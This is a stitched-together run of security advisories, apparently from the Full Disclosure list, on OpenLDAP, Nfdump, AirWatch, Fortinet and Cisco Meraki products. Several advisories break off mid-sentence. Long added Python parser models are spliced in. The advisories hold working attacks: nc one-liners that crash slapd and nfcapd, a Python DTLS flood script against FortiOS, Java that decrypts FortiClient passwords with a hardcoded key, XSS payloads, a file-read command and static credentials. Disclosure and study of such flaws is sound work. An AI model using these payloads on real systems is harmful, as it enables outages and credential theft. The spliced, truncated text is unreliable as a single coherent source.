[FD] OpenLDAP ber_get_next Denial of Service
OpenLDAP ber_get_next Denial of Service

Affected Versions: OpenLDAP <= 2.4.42
PDF: http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf

+-------------+
| Description |
+-------------+

This document details a vulnerability found within the OpenLDAP server daemon. A denial of service vulnerability was discovered within the slapd daemon, allowing an unauthenticated attacker to crash the OpenLDAP server. By sending a crafted packet, an attacker can cause the OpenLDAP server to reach an assert() statement, crashing the daemon.

This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package repository.

+--------------+
| Exploitation |
+--------------+

By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an assert() call within the ber_get_next function (io.c line 682) that is hit when decoding tampered BER data. The following proof of concept can be used to trigger the condition:

--[ Exploit POC

echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389

The above causes slapd to abort as follows when running with '-d3'. Note that the server crashes in the same way when running in normal daemon mode without the debug flag.

--[ slapd -d3

55f0b36e slap_listener_activate(7):
55f0b36e >>> slap_listener(ldap:///)
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  ff 84 84 84 84 84 77 83   ......w.
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=1, got=1
  0a   .
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
slapd: io.c:682: ber_get_next: Assertion `0' failed.

The following GDB back trace provides further information as to the location of the issue.

--[ back trace

Program received signal SIGABRT, Aborted.
[Switching to Thread 0x72e4a700 (LWP 1371)]
0x76a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x76a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x76a144e8 in __GI_abort () at abort.c:89
#2  0x76a0c226 in __assert_fail_base (fmt=0x76b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
#3  0x76a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101
#4  0x0053261a in ber_get_next (sb=0x7fffe40008c0, len=0x72e49b40, ber=0x7fffe4000a00) at io.c:682
#5  0x00420b56 in connection_input (cri=, conn=) at connection.c:1572
#6  connection_read (cri=, s=) at connection.c:1460
#7  connection_read_thread (ctx=0x72e49b90, argv=0xf) at connection.c:1284
#8  0x0050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696
#9  0x76d8f0a4 in start_thread (arg=0x72e4a700) at pthread_create.c:309
#10 0x76ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111

+----------+
| Solution |
+----------+

This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 in git://git.openldap.org/openldap.git

+----------+
| Timeline |
+----------+

10/09/15 - Issue raised on the OpenLDAP issue tracker and marked as a 'minor' security issue, as per the requirements in the ITS, making the issue public.
10/09/15 - Patch pushed to the OpenLDAP master branch by Howard Chu, commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
10/09/15 - Release of this advisory document.

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance,
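To make the crafted packet above readable, the following Python 3 decoder walks the BER tag and length octets the way a liblber caller sees them. It is an added illustration, not code from the advisory or from OpenLDAP: the cap of 4 tag octets is an assumption chosen to show the rejection path (liblber packs the tag into a ber_tag_t, so its own limit is tied to that type's size), the LDAP forbids-indefinite-length rule is applied to the length octets, and the well-formed bindRequest used for comparison is a constructed sample. The point it makes is that an over-long tag or an unsupported length encoding is an input error to hand back to the caller, not a condition to assert() on.

```python
import base64

# The advisory's crafted packet, decoded here for inspection
POC = base64.b64decode("/4SEhISEd4MKYj5ZMgAAAC8=")
# A constructed, well-formed LDAP PDU for comparison: SEQUENCE (0x30), length 12,
# wrapping messageID 1 and an anonymous simple bindRequest
GOOD = bytes.fromhex("300c020101600702010304008000")

# Illustrative caps. liblber packs the tag into a ber_tag_t, so its real limit is
# tied to sizeof(ber_tag_t); 4 octets here is an assumption chosen to show the
# rejection path. LDAP (RFC 4511) only allows definite lengths, so a
# length-of-length of 0 is rejected as well.
MAX_TAG_OCTETS = 4
MAX_LENGTH_OCTETS = 4


class BerError(ValueError):
    """Malformed BER header: the decoder's answer to the caller, not an abort()."""


def decode_ber_header(buf, max_tag_octets=MAX_TAG_OCTETS):
    """Decode the tag and length octets of the TLV at buf[0].

    Returns (tag_number, constructed, length, header_len).
    """
    if not buf:
        raise BerError("empty buffer")
    first = buf[0]
    pos = 1
    constructed = bool(first & 0x20)
    tag_number = first & 0x1f
    if tag_number == 0x1f:
        # High-tag-number form: base-128 digits, MSB set on every octet but the last
        tag_number = 0
        while True:
            if pos >= len(buf):
                raise BerError("truncated tag")
            if pos >= max_tag_octets:
                raise BerError("tag encoding exceeds %d octets" % max_tag_octets)
            octet = buf[pos]
            pos += 1
            tag_number = (tag_number << 7) | (octet & 0x7f)
            if not octet & 0x80:
                break
    if pos >= len(buf):
        raise BerError("truncated length")
    length = buf[pos]
    pos += 1
    if length & 0x80:
        # Long-form length: the low seven bits count the length octets that follow
        n = length & 0x7f
        if n == 0 or n > MAX_LENGTH_OCTETS:
            raise BerError("unsupported length-of-length %d" % n)
        if pos + n > len(buf):
            raise BerError("truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag_number, constructed, length, pos


def describe(buf, max_tag_octets=MAX_TAG_OCTETS):
    """One-line verdict for a packet; never raises."""
    try:
        tag, constructed, length, hdr = decode_ber_header(buf, max_tag_octets)
    except BerError as e:
        return "reject: %s" % e
    return "tag %d (%s), length %d, header %d octets" % (
        tag, "constructed" if constructed else "primitive", length, hdr)


if __name__ == "__main__":
    print("POC, 4-octet cap :", describe(POC))
    print("POC, 8-octet cap :", describe(POC, 8))
    print("bindRequest      :", describe(GOOD))
```

With the cap raised to 8 octets the same bytes decode without complaint: a 7-octet private-class constructed tag followed by a 3-octet length of 680510, far more than the 17-byte packet carries. That is the second thing a server-side decoder should check, against its configured maximum PDU size, before it allocates or waits for the body.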
[FD] KeeFarce - A KeePass 2.x database extraction tool
KeeFarce - An in-memory looter for KeePass 2.x databases

URL: https://github.com/denandz/KeeFarce

+-------------+
| Description |
+-------------+

KeeFarce leverages DLL injection to export the information (including usernames and passwords) of a running and unlocked KeePass database into a cleartext CSV file.

Source code and prebuilt executables are available on GitHub at https://github.com/denandz/KeeFarce

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Nfdump Nfcapd 1.6.14 Multiple Vulnerabilities
Nfdump Nfcapd Multiple Vulnerabilities

Affected Versions: Nfdump <= 1.6.14
PDF: http://www.security-assessment.com/files/documents/advisory/Nfdump%20nfcapd%201.6.14%20-%20Multiple%20Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This document details multiple vulnerabilities found within the nfcapd netflow collector daemon. An unauthenticated attacker may leverage these vulnerabilities to trigger a denial of service condition within the nfcapd daemon. Two heap-based out-of-bounds read vulnerabilities were found within the IPFIX processing code and one logic-based denial of service was found in the NetFlow v9 processing code.

+--------------+
| Exploitation |
+--------------+

== Process_ipfix_template_add heap overflow ==

By tampering with the flowset_length field of an IPFIX packet, an attacker can trigger a denial of service condition within nfcapd. Line 931 of ipfix.c decrements the unsigned size_left value by 4 without first checking that at least 4 bytes remain. When the initial value is less than 4 (1 in the POC below), the subtraction underflows and size_left (the remaining packet payload to be processed) wraps to 4294967293. nfcapd then keeps walking the heap-based buffer allocated for the input packet (allocated at line 381 of nfcapd.c) until it reads invalid memory and crashes with a segmentation fault.

--[ Process_ipfix_template_add heap overflow POC

echo "AAoABQACAAUBAA==" | base64 -d | nc -u 127.0.0.1

== Process_ipfix_option_templates heap overflow ==

By submitting an IPFIX packet with a flowset id of 3 and a large scope_field_count (65535 in the POC below), nfcapd will continuously process the heap-based buffer allocated for the packet, eventually hitting an invalid memory address and crashing with a segmentation fault. The scope_field_count is taken directly from the packet (line 1108, ipfix.c) and is subsequently used, without being checked against the remaining packet length, as the bound of the for loop processing the packet contents (line 1138, ipfix.c).

--[ Process_ipfix_option_templates heap overflow POC

echo "AAoAAQADAAoA/wAA//8=" | base64 -d | nc -u 127.0.0.1

== Process_v9_data infinite loop ==

By sending a crafted packet, an attacker can cause the nfcapd daemon to enter an infinite loop. As well as consuming a considerable amount of processing power, this infinite loop will eventually exhaust all available disk space. Once disk space is exhausted, the nfcapd daemon will exit.

The infinite loop is triggered by the table->input_record_size variable being zero. As the Process_v9_data function processes the packet, table->input_record_size is subtracted from the size_left variable, the intention being that processing concludes once size_left reaches zero. As size_left is decremented by zero on each iteration, the while loop (line 1529, netflow_v9.c) runs forever.

--[ Process_v9_data infinite loop POC

echo "AAkUBAQAAAYA/w==" | base64 -d | nc -u 127.0.0.1

Further information is available in the PDF version of this advisory.

+----------+
| Solution |
+----------+

Upgrade to the latest Nfdump codebase (commit 6ef51a7405797289278b36a9a7deabb3cb64d80c or later).

+----------+
| Timeline |
+----------+

12/03/2016 - Advisory sent to Peter Haag
19/03/2016 - Advisory acknowledged
07/05/2016 - Additional information requested
07/05/2016 - Updated version released on GitHub
10/05/2016 - Advisory release
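The three conditions above come down to arithmetic on untrusted length fields. The Python 3 model below is an added example, not nfdump code: it walks the two IPFIX POC datagrams with 32-bit wrap emulated, once with the pre-fix arithmetic and once with the checks a hardened parser needs, and models the NetFlow v9 data loop with a zero record size. Assumptions: the set header is taken to start at offset 4 of the POC bytes (read off the bytes themselves, not from nfcapd's source), the oversized receive buffer is simulated by zero padding, the well-formed template set is a constructed sample, and the check placement is illustrative rather than copied from ipfix.c or netflow_v9.c.

```python
import base64
import struct

# The advisory's PoC datagrams as published. In both, a 4-byte version/length
# prefix is followed directly by an IPFIX set header; that offset is read off
# the bytes themselves (an assumption), not taken from nfcapd's source.
POC_TEMPLATE_ADD = base64.b64decode("AAoABQACAAUBAA==")         # set id 2, set length 5
POC_OPTION_TEMPLATES = base64.b64decode("AAoAAQADAAoA/wAA//8=")  # set id 3, scope count 0xffff
# Constructed, well-formed template set: template 256 = sourceIPv4Address(8), destinationIPv4Address(12)
GOOD_TEMPLATE_SET = bytes.fromhex("000a0014" "00020010" "01000002" "00080004" "000c0004")
SET_OFFSET = 4
U32 = 0xffffffff  # size_left is a 32-bit unsigned: (1 - 4) & U32 == 4294967293


class MalformedSet(ValueError):
    """Hardened verdict: log it, drop the datagram, keep collecting."""

class OutOfBounds(Exception):
    """Stands in for the SIGSEGV: the parser walked off the receive buffer."""

class LoopDetected(RuntimeError):
    """Demo-only guard so the unhardened v9 walk terminates; nfcapd has none."""


def padded(pkt, size=4096):
    # Simulate the oversized heap receive buffer the PoC is read into (assumption)
    return pkt + b"\x00" * size


class Reader:
    def __init__(self, buf, pos):
        self.buf, self.pos = buf, pos

    def u16(self):
        if self.pos + 2 > len(self.buf):
            raise OutOfBounds(self.pos)
        (v,) = struct.unpack_from(">H", self.buf, self.pos)
        self.pos += 2
        return v


def parse_template_set(pkt, hardened=True):
    """IPFIX template set (id 2) -> [(template_id, [(element_id, length), ...]), ...]."""
    r = Reader(pkt, SET_OFFSET)
    set_id, set_len = r.u16(), r.u16()
    if hardened and (set_id != 2 or set_len < 4 or SET_OFFSET + set_len > len(pkt)):
        raise MalformedSet("bad set header: id %d length %d" % (set_id, set_len))
    size_left = (set_len - 4) & U32
    templates = []
    while size_left:
        if hardened and size_left < 4:
            break                                 # trailing set padding; never subtract past zero
        tid, count = r.u16(), r.u16()
        size_left = (size_left - 4) & U32         # ipfix.c:931: with size_left == 1 this wraps
        fields = []
        for _ in range(count):
            if hardened and size_left < 4:
                raise MalformedSet("template %d: field list overruns the set" % tid)
            ie, length = r.u16(), r.u16()
            size_left = (size_left - 4) & U32
            if ie & 0x8000:                       # enterprise-specific element: 4-byte PEN follows
                if hardened and size_left < 4:
                    raise MalformedSet("template %d: truncated enterprise number" % tid)
                r.u16(); r.u16()
                size_left = (size_left - 4) & U32
            fields.append((ie & 0x7fff, length))
        templates.append((tid, fields))
    return templates


def parse_options_template_set(pkt, hardened=True):
    """IPFIX options template set (id 3) -> (template_id, scope_fields, other_fields)."""
    r = Reader(pkt, SET_OFFSET)
    set_id, set_len = r.u16(), r.u16()
    if hardened and (set_id != 3 or set_len < 10 or SET_OFFSET + set_len > len(pkt)):
        raise MalformedSet("bad set header: id %d length %d" % (set_id, set_len))
    size_left = (set_len - 4 - 6) & U32
    tid, field_count, scope_count = r.u16(), r.u16(), r.u16()   # ipfix.c:1108 reads scope_count
    # RFC 7011: field_count includes the scope fields, and there is at least one scope field
    if hardened and (scope_count == 0 or scope_count > field_count or field_count * 4 > size_left):
        raise MalformedSet("template %d: %d scope of %d fields in %d bytes" % (tid, scope_count, field_count, size_left))
    scope = [(r.u16(), r.u16()) for _ in range(scope_count)]               # the ipfix.c:1138 loop
    fields = [(r.u16(), r.u16()) for _ in range(field_count - scope_count)]
    return tid, scope, fields


def walk_v9_data_records(size_left, input_record_size, hardened=True, max_records=1 << 16):
    """Mirror of the netflow_v9.c:1529 loop; returns the number of records consumed."""
    if hardened and input_record_size == 0:
        raise MalformedSet("template with zero-length records would never advance")
    consumed = 0
    while size_left > 0 and size_left >= input_record_size:
        size_left -= input_record_size            # subtracting zero leaves size_left unchanged
        consumed += 1
        if consumed > max_records:
            raise LoopDetected("size_left never reaches zero")
    return consumed


def classify(thunk):
    """Run a parse and name what happened."""
    try:
        thunk()
    except MalformedSet:
        return "rejected"
    except OutOfBounds:
        return "crash"
    except LoopDetected:
        return "loop"
    return "parsed"


if __name__ == "__main__":
    for hardened in (False, True):
        print("template_add     hardened=%-5s %s" % (hardened, classify(lambda: parse_template_set(padded(POC_TEMPLATE_ADD), hardened))))
        print("option_templates hardened=%-5s %s" % (hardened, classify(lambda: parse_options_template_set(padded(POC_OPTION_TEMPLATES), hardened))))
        print("v9 record size 0 hardened=%-5s %s" % (hardened, classify(lambda: walk_v9_data_records(64, 0, hardened))))
```

Unhardened, the template POC wraps size_left after its first record and walks off the padded buffer, and the options POC reads 65535 four-byte field specifiers from a set that advertises ten bytes; hardened, the first is treated as an empty set with padding and the second is dropped as malformed. The v9 case shows why a zero record size has to be rejected when the template is installed, not discovered in the data loop.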
[FD] AirWatch Multiple Direct Object References
AirWatch Multiple Direct Object References

Affected Versions:
  AirWatch by VMware Cloud Console 7.3.1.0
  AirWatch by VMware on-premise 7.3.x.x prior to 7.3.3.0 (FP3)
CVE Number: CVE-2014-8372
PDF: http://www.security-assessment.com/files/documents/advisory/Airwatch_Multiple_Direct_Object_Reference_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

Multiple direct object reference vulnerabilities were found within the AirWatch cloud console. VMware advised that these issues also affect on-premise AirWatch deployments. A malicious AirWatch user may leverage several direct object references to gain access to information regarding other AirWatch customers using the AirWatch cloud. This includes viewing groups and downloading private APKs belonging to other organisations.

+--------------+
| Exploitation |
+--------------+

Detailed exploitation information is available in the PDF version of this advisory, available at http://www.security-assessment.com

+----------+
| Solution |
+----------+

The AirWatch cloud based solution has been patched by VMware. The on-premises deployment was also susceptible to the above attacks; on-premises users should update to the latest version of AirWatch. VMware has published a det
ailed advisory, including patch and mitigation information, at the following URL:
http://www.vmware.com/security/advisories/VMSA-2014-0014.html

+---------------------+
| Disclosure Timeline |
+---------------------+

29/10/2014 - Initial email to AirWatch support staff.
03/11/2014 - Advisory released to AirWatch.
05/11/2014 - Advisory acknowledged by the VMware Security Response Center, who advised the cloud solution would be patched within 48 hours.
10/12/2014 - VMware releases patch and advisory.
29/01/2015 - Release of this document.
[FD] Fortinet FortiAuthenticator Multiple Vulnerabilities
Fortinet FortiAuthenticator Multiple Vulnerabilities

Affected Versions: Verified on FortiAuthenticator v300 build 0007
PDF: http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiAuthenticator_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This advisory details multiple vulnerabilities found within the Fortinet FortiAuthenticator virtual appliance. FortiAuthenticator is a user identity management appliance, supporting two factor authentication, RADIUS, LDAP, 802.1X wireless authentication, certificate management and single sign on.

The FortiAuthenticator appliance was found to contain a subshell bypass vulnerability, allowing remote administrators to gain root level access via the command line. Local file and password disclosure vulnerabilities were discovered, as well as a reflected Cross Site Scripting vulnerability within the SCEP system.

+--------------+
| Exploitation |
+--------------+

--[ dbgcore_enable_shell_access Subshell Bypass

By logging into the FortiAuthenticator and executing the 'shell' command, a malicious user can gain a root /bin/bash shell on the server. However, unless the /tmp/privexec/dbgcore_enable_shell_access file exists (the contents of this file are irrelevant), the command returns 'shell: No such command.' If the file is present, the command succeeds and a root shell is given.

The /tmp/privexec/dbgcore_enable_shell_access file can be created by using the 'load-debug-kit' command and specifying a network accessible TFTP server hosting the relevant debug kit. The debug kits were found to be generated by an internal Fortinet tool called 'mkprivexec'. The 'load-debug-kit' command expects encrypted binaries, which are subsequently executed. An attacker that can either generate a valid debug kit or create the appropriate file in /tmp/privexec can therefore get a root shell.

This gating is likely a workaround for CVE-2013-6990; however, an attacker can still obtain root level command line access with the additional steps above.

--[ Local File Disclosure

A malicious user can pass the '-f' flag to the 'dig' command and read files from the filesystem. For example, executing 'dig -f /etc/passwd' and observing the command's output retrieves the contents of /etc/passwd.

--[ Password Disclosure

A malicious user may use the debug logging functionality within the FortiAuthenticator administrative console to obtain the passwords of the PostgreSQL database users. The disclosed passwords were found to be weak and are static across FortiAuthenticator appliances. The following credentials were enumerated:

+----------+----------+
| Username | Password |
+----------+----------+
| slony    | slony    |
| www-data | www-data |
+----------+----------+

--[ Reflected Cross Site Scripting

By coercing a legitimate user (usually through a social engineering attack) to visit a specific FortiAuthenticator URL, an attacker may execute malicious JavaScript in the context of the user's browser. This can subsequently be used to attack the user's browser or hijack their session. This is due to the 'operation' parameter of the SCEP service being reflected to the end user without sufficient input validation and output encoding. The following URL can be used to replicate the reflected Cross Site Scripting vulnerability:

https:///cert/scep/?operation=alert(1)

+----------+
| Solution |
+----------+

No official solution is currently available for these vulnerabilities. Email correspondence with Fortinet suggests that the Local File Disclosure and Password Disclosure vulnerabilities have been resolved in version 3.2. No official documentation was found to confirm this.

+---------------------+
| Disclosure Timeline |
+---------------------+

08/10/2014 - Initial email sent to Fortinet PSIRT team.
09/10/2014 - Advisory documents sent to Fortinet.
15/10/2014 - Acknowledgement of advisories from Fortinet.
16/10/2014 - Fortinet advised the Local File and Password disclosure issues would be resolved in the 3.2 release.
31/10/2014 - Additional information sent to Fortinet regarding the reflected XSS.
03/11/2014 - Additional information sent to Fortinet regarding the reflected XSS.
02/12/2014 - Update requested from Fortinet.
13/12/2014 - Update requested from Fortinet.
29/01/2015 - Advisory release.
[FD] Fortinet FortiClient Multiple Vulnerabilities
Fortinet FortiClient Multiple Vulnerabilities

Affected Versions: Verified on FortiClient iOS v5.2.028 and FortiClient Android 5.2.3.091
PDF: http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiClient_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This advisory details multiple vulnerabilities found within the Fortinet FortiClient mobile applications. FortiClient is an endpoint security suite, intended to provide an all-in-one security solution.

Both the Android and iOS applications did not check the validity of SSL certificates, allowing an attacker performing a Man-In-The-Middle attack to gain access to sensitive information such as SSL VPN credentials and mobile device details.

Hard coded encryption keys were discovered within the Android application. These keys are used to encrypt sensitive data stored within the application's Shared Preferences. As the key does not change per installation, the decryption code from one instance of the FortiClient application can be used to retrieve the saved passwords from any other Android FortiClient installation globally.

+--------------+
| Exploitation |
+--------------+

--[ Hardcoded Encryption Keys

After decompiling the FortiClient Android application, the 'qm' class was found to contain a hard coded private string 'KEY'. The character array was found to contain "FoRtInEt!AnDrOiD". This key is used to encrypt and decrypt saved passwords stored within the application's shared preferences. The following Java code can be used to decrypt an Android FortiClient shared preference value encrypted in this manner:

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public final class aa {
    // "FoRtInEt!AnDrOiD": the hard coded key recovered from the decompiled 'qm' class
    private static final String KEY = new String(new char[] {
        70, 111, 82, 116, 73, 110, 69, 116, 33, 65, 110, 68, 114, 79, 105, 68 });

    // The static IV used alongside the key, also taken from the decompiled code
    private static final byte[] IV = {
        117, 122, 39, 67, 114, 124, 115, 44, 113, 116, 124, 123, 58, 89, 118, 94 };

    public static void main(String[] args) {
        String crypted = "F3792242D92707AD537AACF429D8E28A";
        System.out.println("Encrypted String:" + crypted);
        System.out.println("Decrypted String:" + decrypt(crypted));
    }

    // Decodes the hex string stored in the shared preference, then decrypts it with
    // AES/CBC/PKCS5Padding under the static key and IV. Returns null on any failure.
    public static String decrypt(String paramString) {
        try {
            byte[] arrayOfByte = new byte[paramString.length() / 2];
            for (int i = 0; i < paramString.length() / 2; i++) {
                int hi = Integer.parseInt(paramString.substring(i * 2, i * 2 + 1), 16);
                int lo = Integer.parseInt(paramString.substring(i * 2 + 1, i * 2 + 2), 16);
                arrayOfByte[i] = (byte) (hi * 16 + lo);
            }
            IvParameterSpec localIvParameterSpec = new IvParameterSpec(IV);
            SecretKeySpec localSecretKeySpec = new SecretKeySpec(KEY.getBytes("UTF-8"), "AES");
            Cipher localCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            localCipher.init(Cipher.DECRYPT_MODE, localSecretKeySpec, localIvParameterSpec);
            return new String(localCipher.doFinal(arrayOfByte), "UTF-8");
        } catch (Exception localException) {
            // Bad hex, wrong key or a padding error: nothing useful to return
            return null;
        }
    }
}

--[ Broken SSL Certificate Validation

By performing a Man-In-The-Middle attack, an attacker can host their own SSL server with a self-signed certificate and harvest credentials from legitimate end users. As the FortiClient SSL VPN client and Endpoint Control client do not validate certificates, the attacker can harvest credentials and mobile device information.

The Android version of the FortiClient software was found to display a warning prompt when the SSL VPN server's certificate is not trusted. The iOS version does not display any warnings to the user, regardless of whether or not the 'check server certificate' option is enabled (note that this option is disabled by default). This exposes FortiClient iOS users to Man-In-The-Middle attacks.

The Endpoint Control protocol, which attempts to connect to the device's default gateway on TCP port 8010, similarly does not validate SSL certificates. Both the FortiClient Android and iOS applications were found to ignore certificate validity for the Endpoint Control protocol and did not prompt the end user when the server's certificate was invalid.

+----------+
| Solution |
+----------+

No official solution is currently available for these vulnerabilities.

+---------------------+
| Disclosure Timeline |
+---------------------+

08/10/2014 - Initial email sent to Fortinet PSIRT team.
09/10/2014 - Advisory documents sent to Fortinet.
15/10/2
[FD] Cisco Meraki Systems Manager Multiple Vulnerabilities
Cisco Meraki Systems Manager Multiple Vulnerabilities

Affected Versions: Cisco Meraki Systems Manager - Unknown Versions
PDF: http://www.security-assessment.com/files/documents/advisory/Cisco_Meraki_Systems_Manager_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

The Cisco Meraki Systems Manager system was found to suffer from a number of vulnerabilities. A Cross Site Request Forgery vulnerability was discovered, allowing an attacker to determine the registration code for an organisation's Systems Manager instance or send out spam email. A Stored Cross Site Scripting vulnerability was discovered, allowing a malicious end user running the Systems Manager MDM software to stage Cross Site Scripting attacks against the organisation's administrative users. The Cisco Meraki Systems Manager administrative console was found to suffer from a Mass Assignment vulnerability, allowing a malicious user to leverage the "Backpack" functionality to automatically download and install arbitrary applications to the end user devices.

Additionally, legitimate updates for the Systems Manager MDM software were found to be shipped over HTTP. This allows an attacker to intercept and tamper with the application package, provided they have access to the network communications somewhere between the client and the Meraki cloud.

+--------------+
| Exploitation |
+--------------+

--[ Cross Site Request Forgery

The Cisco Meraki Systems Manager administrative console uses an 'X-CSRF-Token' HTTP header to protect against Cross Site Request Forgery attacks; however, it was found that this header is often not validated on the server side and can simply be omitted. The following POC can be used to coerce an authenticated user into sending an email containing arbitrary content to an arbitrary address. The POC is a form posting to:

https://n85.meraki.com/Systems-Manager/n/Q6mExcvb/manage/configure/pcc_send_mdm_link/

The CSRF POC above will send an invitation message to 'ao367gnae9aer7...@mailinator.com'. An attacker may leverage this to enumerate an organisation's registration code and stage further attacks against the Meraki deployment.

--[ Stored Cross Site Scripting

Systems Manager relies on a certificate on the mobile device (provisioned via SCEP during registration) to provide authentication. A condition was discovered wherein a malicious user can retrieve the relevant certificate and key and stage attacks against the Systems Manager administrative console. This led to a Stored Cross Site Scripting vulnerability, where a malicious user may send a crafted request to /android/callback with malicious JavaScript code in the system_model parameter. The Mdm-Signature header is then recreated by the malicious user and the payload sent. The Mdm-Signature header can be generated by using a SpongyCastle content signer to produce a signature over the POST parameter data.

The following request details the exploit. The system_model parameter is the affected field; the remaining parameters have been shortened for brevity's sake.

POST /android/callback HTTP/1.1
Mdm-Signature:
Content-Length:
Content-Type: application/x-www-form-urlencoded
Host:
Connection: Keep-Alive

{snip}&system_model=Galaxy+XSS+%3cscript%3ealert(%27Malicious+Javascript%27)%3c%2fscript%3e{snip}

The certificate and key used to create the Mdm-Signature header can be found under /data/data/com.meraki.sm/files/ on a provisioned Android device. The password for the keystore is stored in the 'scep_keystore_password' shared preference.

In order to exploit this, the attacker must be registered against the Meraki MDM instance (in order to have the correct certificate). This requires knowledge of a 10 digit enrollment code (xxx-xxx-). These need to be brute forced or obtained via other means (invitation email, QR code, etcetera).

--[ Backpack Mass Assignment

The 'Backpack' functionality of the Cisco Meraki Systems Manager can be abused to install arbitrary APK files on users' devices. This is achieved by using mass assignment to set the 'auto_download' and 'auto_install' flags on a specific item (in this case an APK file). This is done in the POST to /System-Manager/n//manage/configure/update_pcc_ios. Further information is available in the PDF version of this advisory.

It should be noted that the management policy popup on the device disables the back button once the user is prompted to install the arbitrary APK, and access back into the Meraki Systems Manager application cannot be achieved without tapping th
[FD] Fortinet FortiOS Multiple Vulnerabilities
Fortinet FortiOS Multiple Vulnerabilities

Affected Versions: Verified on FortiOS Firmware v5.0,build4457 (GA Patch 7)
PDF: http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiOS_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This advisory details multiple vulnerabilities found within the Fortinet FortiOS software. FortiOS is a security-hardened, purpose-built operating system that is the foundation of all FortiGate network security platforms.

A denial of service vulnerability was discovered within the CAPWAP daemon, allowing an attacker to lock up the CAPWAP Access Controller. This was achieved by sending recurring DTLS messages to the daemon. The CAPWAP daemon itself was found to suffer from a Man-In-The-Middle vulnerability, due to the nature of Fortinet's certificate practices. A Stored Cross Site Scripting vulnerability was also discovered, allowing an attacker to send a crafted CAPWAP join request containing malicious JavaScript code; this code is subsequently rendered in the FortiOS administrative console.

+--------------+
| Exploitation |
+--------------+

--[ CAPWAP Daemon DTLS Denial of Service Vulnerability

During DTLS session establishment, the server sends a 'HelloVerifyRequest' back to the client in response to the initial 'ClientHello'. The client is then required to send a second 'ClientHello' carrying the cookie provided in the 'HelloVerifyRequest'. This stateless cookie exchange is designed to protect the server against denial of service attacks from spoofed or unverified sources. It was discovered that, even though the Fortinet DTLS server implements this, sending a number of initial 'ClientHello' requests in short succession creates a denial of service condition on the FortiOS device.

The number of requests required to trigger the condition was found to depend on the specifications of the machine running FortiOS; however, this was tested against a mid-range FortiGate device and a denial of service condition was successfully caused with as few as ten requests. The following POC code can be used to replicate this vulnerability:

#!/usr/bin/env python3
#
# FortiOS CAPWAP Control Denial Of Service POC
#
# This exploit will trigger a denial of service
# condition on the FortiOS CAPWAP Control Daemon
# by sending recurring DTLS Client Hello
# messages.
#
# Author: Denis Andzakovic
# Date: 19/08/2014
#

import socket
import os
import time
from struct import pack
import binascii
import argparse

# Grab parameters from command line
parser = argparse.ArgumentParser(description='FortiOS CAPWAP Control Server - DTLS Client Hello DOS')
parser.add_argument('-d', '--host', help="IP Address of the host to attack", required=True)
args = parser.parse_args()

randombytes = os.urandom(28)
capwapreamble = b"\x01\x00\x00\x00"          # CAPWAP preamble: DTLS payload follows
hello = b"\x16" + b"\xfe\xff" + b"\x00" * 8  # DTLS record: handshake type, version 1.0, epoch and seq

# Handshake header (ClientHello, length 0x2c, message_seq 0, fragment offset 0,
# fragment length 0x2c) followed by the ClientHello body: version, gmt_unix_time,
# 28 random bytes, empty session id, empty cookie, two cipher suites, null compression
handshakeProtocol = (b"\x01" + b"\x00\x00\x2c" + b"\x00" * 6 + b"\x00\x2c"
                     + b"\xfe\xff" + pack(">i", int(time.time())) + randombytes
                     + b"\x00" + b"\x00" + b"\x00\x04" + b"\x00\x2f\x00\x0a\x01\x00")

while True:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(capwapreamble + hello + pack(">H", len(handshakeProtocol)) + handshakeProtocol,
                (args.host, 5246))
    resp, senderaddr = sock.recvfrom(4098)
    # Skip the CAPWAP preamble, record header, handshake header and server version;
    # what remains is the cookie length byte followed by the cookie
    cookie = resp[31:]
    print("[+] Got response. Cookie: " + binascii.hexlify(cookie).decode())

